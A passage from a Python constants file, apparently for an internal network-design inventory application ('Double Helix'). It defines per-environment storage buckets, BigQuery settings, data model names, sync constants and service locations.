Generation.\nDEEP_DEVICE_PERCENT = 0.75\nDEFAULT_RU_TOLERANCE = 0.15\n\n# Constants for GeoSpatial/Map View objects.\nGEOCODING_SCOPE = 'https://www.googleapis.com/auth/orgstore'\nGEOCODING_URI = 'http://maps.googleapis.com/maps/api/geocode/json?sensor=false'\n\n# Constants used in rack/device templates.\nDL_CODE_INSTANCE = 'INSTANCE'\nDL_CODE_TEMPLATE = 'TEMPLATE'\nTEMPLATE_KEY_NAME = 'template_key_name'\n\n# ACL file.\nACL_FILE = 'authz.yaml'\nSERVER_BASE_PATH = 'google3/ops/netdeploy/netdesign/server'\n# The value of SERVER_PATH changes for tests.\nSERVER_PATH = SERVER_BASE_PATH\n\n# Bundle file names.\nRIBBON_FILENAME = 'ribbon.yaml'\nMETADATA_FILE_END = '_metadata.yaml'\nMETADATA_FILE_LIST = 'metadata_file_list.yaml'\nUNMANAGED_FILE_LIST = 'training/data/unmanaged_file_list.yaml'\n\n# BigQuery query related settings.\nBIGQUERY_CATALOG = 'double_helix_tables'\nBIGQUERY_TABLEVIEW_KIND = 'BigQuery'\n# Increment this prefix anytime the content format changes.\nBIGQUERY_MEMCACHE_PREFIX = BIGQUERY_TABLEVIEW_KIND + 'V2:'\nBIGQUERY_MEMCACHE_TIMEOUT = 60 * 60 # 1 hour.\nBIGQUERY_MAX_MEMCACHE_TIMEOUT = 24 * 60 * 60 # 24 hours\nBIGQUERY_IMPORT_TABLE_PREFIX = 'bq_'\n\n# Project ID for BigQuery.\nBIGQUERY_PROJECT_ID_MAP = collections.defaultdict(\n lambda: APP_IDENTITY_TESTBED, # Default factory.\n **{\n APP_IDENTITY_DEV: APP_IDENTITY_DEV,\n APP_IDENTITY_TEST: APP_IDENTITY_TEST,\n APP_IDENTITY_DEMO: APP_IDENTITY_DEMO,\n APP_IDENTITY_STAGING: APP_IDENTITY_STAGING,\n APP_IDENTITY_PRODBACKUP: APP_IDENTITY_PRODBACKUP,\n APP_IDENTITY_ACT: APP_IDENTITY_ACT,\n APP_IDENTITY_ANT: APP_IDENTITY_ANT,\n APP_IDENTITY_ANTBOM: APP_IDENTITY_ANTBOM,\n APP_IDENTITY_ACT2: APP_IDENTITY_ACT2,\n APP_IDENTITY_PROD: 'google.com:googlenetdesign',\n })\n\n#\n# Google Cloud Storage related settings.\n#\n\nGS = 'gs'\nGS_ARCHIVE = '/archive/'\nGS_DELIMITER = '/'\nGS_BACKUP = 'BACKUP'\nGS_CSVIMPORT = 'CSVIMPORT'\nGS_DOWNLOADS = 'DOWNLOADS'\nGS_EXPORT = 'EXPORTS'\nGS_LEASEDINVENTORY = 'LEASEDINVENTORY'\n\n# Bucket name for cloud storage backup.\nGS_BACKUP_BUCKET_MAP = collections.defaultdict(\n lambda: 'doublehelixbackup_local', # Default factory.\n **{\n APP_IDENTITY_PROD: 'doublehelixbackup',\n APP_IDENTITY_DEV: 'doublehelixbackup_dev',\n APP_IDENTITY_DEMO: 'doublehelixbackup_demo',\n APP_IDENTITY_TEST: 'doublehelixbackup_test',\n APP_IDENTITY_STAGING: 'doublehelixbackup_staging',\n APP_IDENTITY_PRODBACKUP: 'doublehelixbackup_prodbackup',\n APP_IDENTITY_ACT: 'doublehelixbackup_act',\n APP_IDENTITY_ACT2: 'doublehelixbackup_act2',\n APP_IDENTITY_ANT: 'doublehelixbackup_ant',\n APP_IDENTITY_ANTBOM: 'doublehelixbackup_antbom',\n })\n\nGS_CSVIMPORT_BUCKET_MAP = collections.defaultdict(\n lambda: 'doublehelix-csvimport-local', # Default factory.\n **{\n APP_IDENTITY_PROD: 'doublehelix-csvimport',\n APP_IDENTITY_DEV: 'doublehelix-csvimport-dev',\n APP_IDENTITY_DEMO: 'doublehelix-csvimport-demo',\n APP_IDENTITY_TEST: 'doublehelix-csvimport-test',\n APP_IDENTITY_STAGING: 'doublehelix-csvimport-staging',\n APP_IDENTITY_PRODBACKUP: 'doublehelix-csvimport-prodbackup',\n APP_IDENTITY_ACT: 'doublehelix-csvimport-act',\n APP_IDENTITY_ACT2: 'doublehelix-csvimport-act2',\n APP_IDENTITY_ANT: 'doublehelix-csvimport-ant',\n APP_IDENTITY_ANTBOM: 'doublehelix-csvimport-antbom',\n })\n\n# Cloud storage bucket location for cron job outputs.\nGS_DOWNLOADS_BUCKET_MAP = collections.defaultdict(\n lambda: 'doublehelixdownloads_local', # Default factory.\n **{\n APP_IDENTITY_PROD: 'doublehelixdownloads',\n APP_IDENTITY_DEV: 'doublehelixdownloads_dev',\n APP_IDENTITY_DEMO: 'doublehelixdownloads_demo',\n APP_IDENTITY_TEST: 'doublehelixdownloads_test',\n APP_IDENTITY_STAGING: 'doublehelixdownloads_staging',\n APP_IDENTITY_PRODBACKUP: 'doublehelixdownloads_prodbackup',\n APP_IDENTITY_ACT: 'doublehelixdownloads_act',\n APP_IDENTITY_ACT2: 'doublehelixdownloads_act2',\n APP_IDENTITY_ANT: 'doublehelixdownloads_ant',\n APP_IDENTITY_ANTBOM: 'doublehelixdownloads_antbom',\n })\n\n# Cloud storage bucket location for user triggered export/download items.\nGS_EXPORT_BUCKET_MAP = collections.defaultdict(\n lambda: 'doublehelixexport_local', # Default factory.\n **{\n APP_IDENTITY_PROD: 'doublehelixexport',\n APP_IDENTITY_DEV: 'doublehelixexport_dev',\n APP_IDENTITY_DEMO: 'doublehelixexport_demo',\n APP_IDENTITY_TEST: 'doublehelixexport_test',\n APP_IDENTITY_STAGING: 'doublehelixexport_staging',\n APP_IDENTITY_PRODBACKUP: 'doublehelixexport_prodbackup',\n APP_IDENTITY_ACT: 'doublehelixexport_act',\n APP_IDENTITY_ACT2: 'doublehelixexport_act2',\n APP_IDENTITY_ANT: 'doublehelixexport_ant',\n APP_IDENTITY_ANTBOM: 'doublehelixexport_antbom',\n })\n\nGS_EXPERIMENTAL_BUCKET_MAP = collections.defaultdict(\n lambda: 'doublehelixexperimental',\n **{\n APP_IDENTITY_PROD: 'doublehelixexperimental',\n })\n\nGS_LEASEDINVENTORY_BUCKET_MAP = collections.defaultdict(\n lambda: 'doublehelixleasedinventory_local', # Default factory.\n **{\n APP_IDENTITY_PROD: 'doublehelixleasedinventory',\n APP_IDENTITY_DEV: 'doublehelixleasedinventory_dev',\n APP_IDENTITY_DEMO: 'doublehelixleasedinventory_demo',\n APP_IDENTITY_TEST: 'doublehelixleasedinventory_test',\n APP_IDENTITY_STAGING: 'doublehelixleasedinventory_staging',\n APP_IDENTITY_PRODBACKUP: 'doublehelixleasedinventory_prodbackup',\n APP_IDENTITY_ACT: 'doublehelixleasedinventory_act',\n APP_IDENTITY_ACT2: 'doublehelixleasedinventory_act2',\n APP_IDENTITY_ANT: 'doublehelixleasedinventory_ant',\n APP_IDENTITY_ANTBOM: 'doublehelixleasedinventory_antbom',\n })\n\n# Bucket locations from which users can download files from UI.\nGS_REPORT_BUCKET_MAPS = (GS_DOWNLOADS_BUCKET_MAP,\n GS_EXPORT_BUCKET_MAP,\n GS_LEASEDINVENTORY_BUCKET_MAP)\n\nGS_BUCKET_MAPS = collections.defaultdict(\n lambda: GS_EXPERIMENTAL_BUCKET_MAP,\n **{\n GS_BACKUP: GS_BACKUP_BUCKET_MAP,\n GS_DOWNLOADS: GS_DOWNLOADS_BUCKET_MAP,\n GS_CSVIMPORT: GS_CSVIMPORT_BUCKET_MAP,\n GS_EXPORT: GS_EXPORT_BUCKET_MAP,\n GS_LEASEDINVENTORY: GS_LEASEDINVENTORY_BUCKET_MAP,\n })\n\nAPP_ID_BUCKET_SUFFIXES = {\n APP_IDENTITY_DEV: 'dev',\n APP_IDENTITY_TEST: 'test',\n APP_IDENTITY_DEMO: 'demo',\n APP_IDENTITY_PROD: 'prod',\n APP_IDENTITY_STAGING: 'staging',\n APP_IDENTITY_PRODBACKUP: 'prodbackup',\n APP_IDENTITY_ACT: 'act',\n APP_IDENTITY_ACT2: 'act2',\n APP_IDENTITY_ANT: 'ant',\n APP_IDENTITY_ANTBOM: 'antbom',\n APP_IDENTITY_TESTBED: 'testbed-test',\n # For file attachments on local devappserver.\n APP_IDENTITY_DEVAPPSERVER: 'auto',\n}\n\nATTACHMENTS_BUCKET_PREFIX = '/doublehelix-attachments-'\n\n#\n# Foreign Key related settings.\n#\n# Value propagated when parent entity doesn't exist.\nFK_ERROR_VALUE = '[none]'\n# Value propagated when parent entity property doesn't exist.\nFK_MISSING_VALUE = None # Value\n# Limit for how many times we'll retry transactions.\nFK_TRANSACTION_RETRIES = 5\n# The number of transactions to run in parallel.\nFK_TRANSACTION_SIZE = 10\n# Fetch limit for entity queries.\nFK_BATCH_SIZE = FK_TRANSACTION_SIZE * 10\n# How many times to recurse when updating self-loops.\nFK_MAX_RECURSION = 10\n# Memcache key for foreign key references.\nFK_MEMCACHE_KEY = 'ForeignKeyReferences'\n# How long to cache foreign key references.\nFK_MEMCACHE_TIMEOUT = 60 * 30 # 30 minutes.\n\n# Fetch limit for materialized view mapper queries.\nMV_BATCH_SIZE = 1000\n\n# ASCII characters in the range 33 to 126 inclusive.\nVISIBLE_PRINTABLE_ASCII = frozenset(\n set(string.printable) - set(string.whitespace))\n\n# Boolean string alternatives.\nTRUE_VALUES = {'true', 'yes', 'y', '1'}\nFALSE_VALUES = {'false', 'no', 'n', '0'}\n\n# TableView related settings.\nTABLEVIEW_VALID_ALIASES = {'$key_kind', '$key_name'}\n\n# Base model constants.\nCREATED_BY = 'created_by'\nCREATED_ON = 'created_on'\nFK_DISPLAY = 'fk_display'\nNAME = 'name'\nNORMALIZED_NAME = 'normalized_name'\nUPDATED_BY = 'updated_by'\nUPDATED_ON = 'updated_on'\n\n# The model or the kind of an entity.\nMODEL = 'model'\n\n# The row number of a rack.\nRACK_ROW_NUMBER = 'row_number'\n\n# The position of a rack in the rack row.\nRACK_POSITION = 'position'\n\n# Rack max position.\nRACK_MAX_POSITION = 1000\n\nCOPY_DEVICES = 'copy_devices'\n\n# The cable key name in a strand.\nCABLE_KEY_NAME = 'Cable__key_name'\n\n# The net deploy part number of part.\nNDPN = 'ndpn'\n\n# The identifier of an entity.\nKEY_NAME = 'key_name'\n\n# The version number of an entity.\nKEY_VERSION = 'key_version'\n\n# The version number of an entity.\nKEY_SUBTYPE = 'key_subtype'\n\n# The default ordering number of an entity.\nKEY_ORDER = 'key_order'\n\n# The kind name of an entity.\nKEY_KIND = 'key_kind'\n\n# FK suffix.\nFK_KEY_NAME = KEY_NAME\nFK_SEP = '__'\n\n# START foreign key name and entity name constants for DH entities.\nBUILDING_KEY_NAME = 'Building__key_name'\nBUILDING_NAME = 'Building__name'\nDEVICES_KEY_NAME = 'Devices__Key_name'\nFLOOR_KEY_NAME = 'Floor__key_name'\nFLOOR_NAME = 'Floor__name'\nLOGICALDEVICE_KEY_NAME = 'LogicalDevice__key_name'\nLSOPTICS_KEY_NAME = 'LSOptics__key_name'\nMANUFACTURER_KEY_NAME = 'Manufacturer__key_name'\nMETRO_KEY_NAME = 'Metro__key_name'\nNETWORKELEMENT_KEY_NAME = 'NetworkElement__key_name'\nPART_KEY_NAME = 'Part__key_name'\nPOP_KEY_NAME = 'Pop__key_name'\nPOP_NAME = 'Pop__name'\nRACK_KEY_NAME = 'Rack__key_name'\nRACK_ROW_KEY_NAME = 'RackRow__key_name'\nSPACE_KEY_NAME = 'Space__key_name'\nSPACE_NAME = 'Space__name'\nVENDOR_KEY_NAME = 'Vendor__key_name'\n# END foreign key name and entity name constants for DH entities.\n\n# Represents the uuid of the direct parent of card/slot/port.\nPARENT_UUID = 'parent_uuid'\n\n# Represents the root parent of card/slot/port in device hierarchy.\nTOP_DEVICE_UUID = 'top_device_uuid'\nPORTS = 'ports'\nSLOTS = 'slots'\nCARDS = 'cards'\nCONNECTORS = 'connectors'\nSUB_NODE_TYPES = (PORTS, SLOTS, CARDS, CONNECTORS)\n\n# Model names.\nMODEL_ACT_PATH_TX = 'ActPathTx'\nMODEL_BOM = 'BOM'\nMODEL_BOM_ITEM = 'BOMItem'\nMODEL_BUILDING = 'Building'\nMODEL_BUILDINGCONTENTS = 'BuildingContents'\nMODEL_BULK_FIBER_PANEL_CONNECTIONS_VIEW = 'BulkFiberPanelConnectionsView'\nMODEL_BTP_KIND = 'BtpKind'\nMODEL_BTP_SUMMARY = 'BtpSummary'\nMODEL_CABLE = 'Cable'\nMODEL_CAPACITY_FUNCTION = 'CapacityFunction'\nMODEL_CAPACITY_REFERENCE = 'CapacityReference'\nMODEL_CARD = 'Card'\nMODEL_CIRCUIT = 'Circuit'\nMODEL_CIRCUIT_ELEMENT = 'CircuitElement'\nMODEL_CONDUIT_CAPACITY = 'ConduitCapacity'\nMODEL_CIRCUIT_PATH = 'CircuitPath'\nMODEL_CONNECTION_POINT = 'ConnectionPoint'\nMODEL_CRON_ENTRY = 'CronEntry'\nMODEL_TRAFFIC_TIRESIAS_INPUT = 'TrafficTiresiasInput'\nMODEL_DEVICE = 'Device'\nMODEL_DEVICE_CONNECTIVITY_VIEW = 'DeviceConnectivityView'\nMODEL_EDGESPLICE = 'Splice'\nMODEL_FALLOUT = 'Fallout'\nMODEL_FILE_ATTACHMENT = 'FileAttachment'\nMODEL_FLOOR = 'Floor'\nMODEL_FLOORPLAN_CONTENTS = 'FloorplanContents'\nMODEL_HARDWARE_PARTS_MAPPING = 'HardwarePartsMapping'\nMODEL_INFRA_CAP = 'InfraCap'\nMODEL_INFRA_CAP_RULES = 'InfraCapRules'\nMODEL_INTERMETRO = 'InterMetro'\nMODEL_INVENTORY_LOCATION = 'InventoryLocation'\nMODEL_LEASED_WAVE_ROUTE = 'LeasedWaveRoute'\nMODEL_LEASED_WAVE_TO_ROUTE = 'LeasedWaveToRoute'\nMODEL_LIGHT_PATH = 'LightPath'\nMODEL_LOCALITY = 'Locality'\nMODEL_LOCATION = 'Location'\nMODEL_LOG = 'Log'\nMODEL_LOGICAL_DEVICES = 'LogicalDevice'\nMODEL_LOGICAL_LOCATION = 'LogicalLocation'\nMODEL_LSOPTICS = 'LSOptics'\nMODEL_MANUFACTURER = 'Manufacturer'\nMODEL_METRO = 'Metro'\nMODEL_METROCONTENTS = 'MetroContents'\nMODEL_MOGLOG_RACK = 'MoglogRack'\nMODEL_NAMESEQUENCE = 'NameSequence'\nMODEL_NETWORKELEMENT = 'NetworkElement'\nMODEL_NETWORK_CONNECTION = 'NetworkConnection'\nMODEL_OMS = 'OMS'\nMODEL_ON_NETWORK_INVENTORY_MAPPING = 'OnNetworkInventoryMapping'\nMODEL_ORDER = 'Order'\nMODEL_ORDER_ITEM = 'OrderItem'\nMODEL_OSPCABLE_SEGMENT = 'OspCableSegment'\nMODEL_OSPCONTAINER = 'OspContainer'\nMODEL_OSP_LIGHT_PATH_FIBERS = 'OspLightPathFibers'\nMODEL_OVERHEAD_CABLE = 'OverheadCable'\nMODEL_PANEL_XCON = 'PanelXcon'\nMODEL_PART = 'Part'\nMODEL_PATH_ELEMENT = 'PathElement'\nMODEL_PHYSICAL_SPOF = 'PhysicalSPOF'\nMODEL_POP = 'Pop'\nMODEL_POPCONTENTS = 'PopContents'\nMODEL_PORT = 'Port'\nMODEL_CONNECTOR = 'Connector'\nMODEL_CONNECTOR_TYPE = 'ConnectorType'\nMODEL_PERMISSION = 'Permission'\nMODEL_PORT_INTERFACE_TYPE = 'PortInterfaceType'\nMODEL_PORT_RESERVATION = 'PortReservation'\nMODEL_PORT_STATUS_SUMMARY = 'PortStatusSummary'\nMODEL_RACK = 'Rack'\nMODEL_RACK_SPACE_POWER = 'RackSpacePower'\nMODEL_RACKROW = 'RackRow'\nMODEL_RACK_ROLE_TYPE = 'RackRoleType'\nMODEL_RACK_ROLE_SUB_TYPE = 'RackRoleSubType'\nMODEL_ROLE_PAIR = 'RolePair'\nMODEL_SETTING = 'Setting'\nMODEL_SLOT = 'Slot'\nMODEL_SOCKET = 'Socket'\nMODEL_SPACE = 'Space'\nMODEL_SPACE_CONTENT = 'SpaceContent'\nMODEL_SPECTRUM_DESIGN = 'SpectrumDesign'\nMODEL_SPECTRUM_UTILIZATION = 'SpectrumUtilization'\nMODEL_STRAND = 'Strand'\nMODEL_SPLICE = 'Splice'\nMODEL_ALL = 'ALL'\nMODEL_SUBBUILDING = 'SubBuilding'\nMODEL_SUB_CIRCUIT = 'SubCircuit'\nMODEL_SUBMARINE_OMS_OTS = 'SubmarineOMSToOTS'\nMODEL_SUBTOPOLOGY = 'SubTopology'\nMODEL_THIRDPARTY_TRANSPORT = 'ThirdPartyTransport'\nMODEL_TRAFFIC_WEEK_REPORT = 'TrafficWeekReport'\nMODEL_TRANSPORT_PORTMAP = 'TransportPortmap'\nMODEL_VENDOR = 'Vendor'\nMODEL_VIRTUAL_INTERFACE = 'VirtualInterface'\nMODEL_VIRTUAL_INTERFACE_PORTS = 'VirtualInterfacePorts'\n# Meta models used in device logic.\nMODEL_EXISTING = 'Existing'\nMODEL_TEMPLATE = 'Template'\n\n# Model names used only by UNM export and ACT Pipeline.\nMODEL_UNM_CHASSIS = 'Chassis'\nMODEL_UNM_DEVICE_CONNECTIVITY = 'DeviceConnectivity'\nMODEL_UNM_PATCH_PANEL = 'PatchPanel'\nMODEL_UNM_PARENT_RACK = 'ParentRack'\nMODEL_UNM_SERVICE_PROVIDER_DEPRECATED = 'ServiceProvider'\n\nUNKNOWN_NUMBER = 999\n\n# The regular expresssion for the Google Netops Rack.\nREGEX_NETOPS_RACK = r'[A-Z]{3}\\d{2}-\\d{1,2}-\\d{1,2}'\n\n# The constant to represent a Google Netops Rack.\nGOOGLE_NETOPS_RACK = 'Google Netops Rack'\n\n# The constant to represent a Vendor Rack.\nVENDOR_RACK = 'Vendor Rack'\n\n# The constant to represent a Number only Rack.\nDC_RACK = 'DC Rack'\n\nOTHER_RACK = 'Other Rack'\n\n# The constant to represent a prefix for Vendor Rack.\nVRR_PREFIX = 'VRR-'\n\n# Default number of pins to assume for MPO port tracing.\nDEFAULT_MPO_PIN_COUNT = 12\n\n# The setting entity key name for height_ru tolerance.\nHEIGHT_RU_TOLERANCE = 'HEIGHT_RU_TOLERANCE'\n\n# The setting entity for import status list view.\nIMPORT_STATUS_LIST_PERM = 'GROUPS_ALLOWED_ANY_IMPORT_STATUS'\n\n# The setting entity for allowing validation override for csv import.\nALLOWED_IMPORT_OVERRIDE = 'GROUPS_ALLOWED_IMPORT_OVERRIDE'\n\n# The setting entity for allowing creating new tables via csv import.\nCSV_CREATE_GROUPS = 'CSV_CREATE_GROUPS'\n\n# START NetcrackerSync constants.\n# The NetCracker object id of the entity.\nOBJECT_ID = 'OBJECT_ID'\n\n# The allowed NetCracker update operations.\nACCEPTED_NC_ACTIONS = ('insert', 'update', 'delete')\n\n# Settings.\n# The setting entity key name for Grenade dev stubby server.\nGRENADE_DEV_HOST_URL = 'GRENADE_DEV_STUBBY_URL'\n\n# The setting entity key name for Grenade staging stubby server.\nGRENADE_STAGING_HOST_URL = 'GRENADE_STAGING_STUBBY_URL'\n\n# The setting entity key name for Grenade test stubby server.\nGRENADE_TEST_HOST_URL = 'GRENADE_TEST_STUBBY_URL'\n\n# The setting entity key name for Grenade prod stubby server.\nGRENADE_PROD_HOST_URL = 'GRENADE_PROD_STUBBY_URL'\n\n# The setting entity key name for Grenade prodbackup stubby server.\nGRENADE_PRODBACKUP_HOST_URL = 'GRENADE_PRODBACKUP_STUBBY_URL'\n\n# The setting entity key name for Grenade act stubby server.\nGRENADE_ACT_HOST_URL = 'GRENADE_ACT_STUBBY_URL'\n\n# The default Grenade stubby url.\nDEFAULT_GRENADE_HOST_URL = ('blade:netops-bazooka-grenade-dev')\n\n# Netcracker sync operations.\nNET_CRACKER_DELETE = 'Delete'\nNET_CRACKER_INSERT = 'Insert'\nNET_CRACKER_UPDATE = 'Update'\n\n# Netcracker Sync queue stats 'Setting' constants.\nNCSYNC_QUEUE_THRESHOLD = 'NCSYNC_QUEUE_THRESHOLD'\nNCSYNC_QUEUE_DEFAULT_THRESHOLD = 1000\n\nNCSYNC_QUEUE_NOTIFICATION_TO = 'NCSYNC_QUEUE_NOTIFICATION_TO'\nNCSYNC_QUEUE_NOTIFICATION_DEFAULT_TO = 'dhops@google.com'\n# END NetcrackerSync constants.\n\n# START Bazooka constants.\n# Settings for Import related flag names.\n# Flag to enable the revision history on the Bazooka imported models.\nBZ_REVISIONS = 'BZ_REVISIONS'\n\n# Flag to switch on/off Moglog only entities on Bazooka import.\nBZ_MOGLOG_ENTITIES = 'BZ_MOGLOG_ENTITIES'\n\n# Flag to switch on/off to import only the device contents.\nBZ_IMPORT_ONLY_CONTENTS = 'BZ_IMPORT_ONLY_DEVICE_CONTENTS'\n\n# Flag to switch on/off Moglog only entities on Bazooka import.\nBZ_DISABLE_MOGLOG_ENTITIES = 'BZ_DISABLE_MOGLOG_ENTITIES'\n\n# Bazooka DB's\nBAZOOKA_DEV = '/cloudsql/google.com:nc-bazooka:bazooka-dev'\nBAZOOKA_PROD_AUTO = '/cloudsql/google.com:nc-bazooka:bazooka-prod-auto'\nBAZOOKA_PROD_AUTO_PRODBACKUP_REPLICA = (\n '/cloudsql/google.com:nc-bazooka:bazooka-prod-auto-prodbackup-replica'\n)\nBAZOOKA_PROD_AUTO_STAGING_REPLICA = (\n '/cloudsql/google.com:nc-bazooka:bazooka-prod-auto-staging-replica'\n)\n\n# Bazooka Speckle instances map.\nSPECKLE_DB = 'bazooka'\n\n# bazookasync user.\nBZ_SYNC = 'bazookasync'\nBZ_SYNC_DELTA_HOURS = 'BZ_SYNC_DELTA_HOURS'\nBZ_SYNC_DELTA_MINUTES = 'BZ_SYNC_DELTA_MINUTES'\n\n# Bazooka tables.\nBZ_CONDUIT_CAPACITY = 'BZ_CONDUIT_CAPACITY'\nBZ_CONNECTOR = 'BZ_CONNECTOR'\nBZ_DEVICE = 'BZ_DEVICE'\nBZ_EDGE_SPLICE = 'BZ_EDGE_SPLICE'\nBZ_ISP_WIRE = 'BZ_ISP_WIRE'\nBZ_LEASED_WAVE_TO_ROUTE = 'BZ_LEASED_WAVE_TO_ROUTE'\nBZ_OSP_CABLE = 'BZ_OSP_CABLE'\nBZ_OSP_FIBER = 'BZ_OSP_FIBER'\nBZ_PANEL_XCON = 'BZ_PANEL_XCON'\nBZ_PORT = 'BZ_PORT'\nBZ_SPLICE = 'BZ_SPLICE'\nBZ_VIRTUAL_INTERFACE_PORTS = 'BZ_VIRTUAL_INTERFACE_PORTS'\n\n# Bazooka columns.\nBZ_NAME = 'NAME'\nBZ_GUNS = 'GUNS'\nBZ_KEY_NAME = 'KEY_NAME'\nBZ_CREATED_BY = 'CREATED_BY'\n\n# END Bazooka constants.\n\n# Common constants.\nCOLON_DELIMITER = ':'\n\n# Common controllers.\nDEP_ERRORS = 'dependency'\nCALL_ERRORS = 'call_errors'\nID = 'id'\n\n# Unknown value constant, for setting values that aren't known instead of using\n# None. Displaying an unknown value is more user-friendly.\nUNKNOWN_VALUE = 'UNKNOWN'\n\n# History constants.\nDEFAULT_HISTORY_LIMIT = 500\n\n# Google Analytics Property ID constants.\nGA_PROPERTY_ID_DEFAULT = 'UA-47042903-3'\n\n# These are the status state values used for display purposes. For status\n# involving equality checks, used the constants below.\nASBUILT_DISPLAY_STATUS = 'AsBuilt'\nINSERVICE_DISPLAY_STATUS = 'InService'\nPLANNED_DISPLAY_STATUS = 'Planned'\nDECOM_DISPLAY_STATUS = 'Decommissioned'\nFORKLIFT_DISPLAY_STATUS = 'Forklift'\n\n# These are the global physical status value list used for status calculations.\nPLANNED_STATUS = ('planned', 'btp')\nASBUILT_STATUS = ('asbuilt',)\nDECOMMISSIONED_STATUS = ('decommissioned',)\n\n# Physical status field constants.\nPHYSICAL_STATUS = 'physical_status'\nPHYSICAL_USAGE_STATUS = 'physical_usage_status' # Representation in Port.\nPHYSICAL_STATUS_ASBUILT = 'asbuilt'\nPHYSICAL_STATUS_DECOMMISSIONED = 'decommissioned'\nPHYSICAL_STATUS_PLANNED = 'planned'\n\n# Logical status.\nLOGICAL_STATUS = 'logical_status'\nLOGICAL_USAGE_STATUS = 'logical_usage_status' # Representation in Port.\nLOGICAL_STATUS_ASBUILT = 'AsBuilt'\nLOGICAL_STATUS_DECOMMISSIONED = 'Decommissioned'\n\n\nMANAGEMENT_STATUS = 'management_status'\nBROKEN_STATUS = 'broken'\n\n# Bazooka report sender email address.\nEMAIL_REPORT_SENDER_MAP = collections.defaultdict(\n lambda: None, # Default factory.\n **{\n APP_IDENTITY_DEV: 'reports@netdesign-dev.appspotmail.com',\n APP_IDENTITY_DEMO: 'reports@netdesign-demo.appspotmail.com',\n APP_IDENTITY_PROD: 'reports@netdesign-prod.appspotmail.com',\n APP_IDENTITY_TEST: 'reports@netdesign-test.appspotmail.com',\n APP_IDENTITY_STAGING: 'reports@netdesign-staging.appspotmail.com',\n APP_IDENTITY_PRODBACKUP: 'reports@netdesign-prodbackup.appspotmail.com',\n APP_IDENTITY_ACT: 'reports@netdesign-act.appspotmail.com',\n APP_IDENTITY_ANTBOM: 'reports@netdesign-antbom.appspotmail.com',\n APP_IDENTITY_ACT2: 'reports@netdesign-act2.appspotmail.com',\n })\n\n# Email template sender email address.\nEMAIL_TEMPLATE_SENDER_MAP = collections.defaultdict(\n lambda: 'doublehelix-noreply+unknown@google.com', # Default factory.\n **{\n APP_IDENTITY_DEMO: 'doublehelix-noreply+demo@google.com',\n APP_IDENTITY_DEV: 'doublehelix-noreply+dev@google.com',\n APP_IDENTITY_PROD: 'doublehelix-noreply+prod@google.com',\n APP_IDENTITY_TEST: 'doublehelix-noreply+test@google.com',\n APP_IDENTITY_STAGING: 'doublehelix-noreply+staging@google.com',\n APP_IDENTITY_PRODBACKUP: 'doublehelix-noreply+prodbackup@google.com',\n APP_IDENTITY_ACT: 'doublehelix-noreply+act@google.com',\n APP_IDENTITY_ACT2: 'doublehelix-noreply+act2@google.com',\n APP_IDENTITY_ANT: 'doublehelix-noreply+ant@google.com',\n APP_IDENTITY_ANTBOM: 'doublehelix-noreply+antbom@google.com',\n })\n\n# Flag for DH training entities.\nTRAINING_DATA_FLAG = 'training'\n\n# Size constants.\nMM_TO_IN_CONSTANT = 0.0393701\nCM_TO_IN_CONSTANT = 0.393701\nIN_TO_MM_CONSTANT = 25.4\nIN_TO_CM_CONSTANT = 2.54\nHEIGHT_RU_CONSTANT = 1.75\n# Used to convert floating point ru values to whole number.\nRU_FACTOR = 100\n\n# Default list method limit.\nLIST_DEFAULT_LIMIT = 250\n\n# Maximum number of results to display in list methods.\nLIST_MAX_LIMIT = 5000\n\n# Maximum ndb.StringProperty size.\nMAX_NDB_STRING_BYTES = 1500\n\n# Borg service location constants.\nCMDATA_ACT = '/abns/netdesign/cmdata_act.server'\nCMDATA_ACT2 = '/abns/netdesign/cmdata_act2.server'\nCMDATA_DEV = '/abns/netdesign/cmdata_dev.server'\nCMDATA_DEMO = '/abns/netdesign/cmdata_demo.server'\nCMDATA_PROD = '/abns/netdesign/cmdata.server'\nCMDATA_PRODBACKUP = '/abns/netdesign/cmdata_prodbackup.server'\nCMDATA_STAGING = '/abns/netdesign/cmdata_staging.server'\nCMDATA_ANTBOM = '/abns/netdesign/cmdata_antbom.server'\n\nHARDWARE_PROD = '/abns/netdesign/hardware.server'\nHARDWARE_DEMO = '/abns/netdesign/hardware_demo.server'\nHARDWARE_DEV = '/abns/netdesign/hardware_dev.server'\nHARDWARE_STAGING = '/abns/netdesign/hardware_staging.server'\nHARDWARE_PRODBACKUP = '/abns/netdesign/hardware_prodbackup.server'\nHARDWARE_ACT = '/abns/netdesign/hardware_act.server'\nHARDWARE_ACT2 = '/abns/netdesign/hardware_act2.server'\nHARDWARE_ANTBOM = '/abns/netdesign/hardware_antbom.server'\n\nROBO_PROD = '/abns/netdesign/robo_api.server'\nROBO_DEV = '/abns/netdesign/robo_api_dev.server'\nROBO_STAGING = '/abns/netdesign/robo_api_staging.server'\nROBO_PRODBACKUP = '/abns/netdesign/robo_api_prodbackup.server'\n\n# pylint: disable=line-too-long\nPORTS_RESERVE_DEV = '/bns/pa/borg/pa/bns/netdesign/doublehelix_dev_service/0'\nPORTS_RESERVE_TEST = '/bns/pa/borg/pa/bns/netdesign/doublehelix_test_service/0'\nPORTS_RESERVE_STAGING = 'blade:doublehelix_staging_service'\nPORTS_RESERVE_PRODBACKUP = 'blade:doublehelix_prodbackup_service'\nPORTS_RESERVE_ACT = 'blade:doublehelix_act_service'\nPORTS_RESERVE_ACT2 = 'blade:doublehelix_act2_service'\nPORTS_RESERVE_PROD = 'blade:doublehelix_prod_service'\nPORTS_RESERVE_ANTBOM = 'blade:doublehelix_antbom_service'\n# pylint: enable=line-too-long\n\n\n# START NEST sync constants.\nNEST_PROD = 'blade:netsoft-nest-server'\nNEST_SERVICE_LOCATION = NEST_PROD\nNEST_SYNC_USER = 'nestsync'\n# END NEST sync constants.\n\n\n# TODO(kyatham): Figure out a better way to handle these scenarios.\nCMDATA_SERVICE_LOCATION_MAP = collections.defaultdict(\n lambda: CMDATA_DEMO, # Default factory.\n **{APP_IDENTITY_PROD: CMDATA_PROD,\n APP_IDENTITY_DEMO: CMDATA_DEMO,\n APP_IDENTITY_DEV: CMDATA_DEV,\n APP_IDENTITY_STAGING: CMDATA_STAGING,\n APP_IDENTITY_ACT: CMDATA_ACT,\n APP_IDENTITY_ACT2: CMDATA_ACT2,\n APP_IDENTITY_ANTBOM: CMDATA_ANTBOM,\n APP_IDENTITY_PRODBACKUP: CMDATA_PRODBACKUP})\n\nHARDWARE_SERVICE_LOCATION_MAP = collections.defaultdict(\n lambda: HARDWARE_DEMO, # Default factory.\n **{APP_IDENTITY_PROD: HARDWARE_PROD,\n APP_IDENTITY_DEMO: HARDWARE_DEMO,\n 